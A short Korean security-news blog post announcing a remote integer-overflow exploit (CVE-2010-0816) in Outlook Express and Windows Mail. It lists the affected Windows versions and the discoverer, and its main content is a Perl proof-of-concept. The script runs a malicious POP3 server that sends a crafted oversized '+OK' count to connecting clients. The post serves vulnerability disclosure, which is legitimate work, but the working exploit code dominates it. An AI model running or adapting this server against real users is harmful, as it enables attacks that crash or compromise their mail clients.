반응형
아웃룩 익스프레스와 윈도우 메일에 대한 Exploit이 발견되었다.
Platforms: Windows 2000
Windows XP
Windows Vista
Windows server 2003
Windows Server 2008 SR2
Exploitation: Remote Exploitable
CVE Number: CVE-2010-0816
Discover Date: 2009-09-11
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com
- Exploit Code
#!/usr/bin/perl -w
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Microsoft Windows Mail CLient & outlook express Remote Integer Overflow
#
use IO::Socket;
$port = 110;
$serv = IO::Socket::INET->new(Proto=>'tcp',
LocalPort=>$port,
Listen=>1)
or die "Error: listen($port)\n";
$cli = $serv->accept() or die "Error: accept()\n";
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK 357913944 100\r\n");
'취약점소식' 카테고리의 다른 글
| [MS] 윈도우 디스플레이 드라이버 취약점 주의 (0) | 2010.05.20 |
|---|---|
| [Adobe]Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities (2) | 2010.05.12 |
| [MS]인터넷 익스플로러(Internet Explorer) 보안 업데이트, 내일부터 긴급 배포 예정 (0) | 2010.03.30 |
| [MS]CVE-2010-0806 제로데이 취약점(Zero-Day Explot) (0) | 2010.03.11 |
| [MS]Vulnerability in Internet Explorer Could Allow Remote Code Execution (0) | 2010.03.11 |
댓글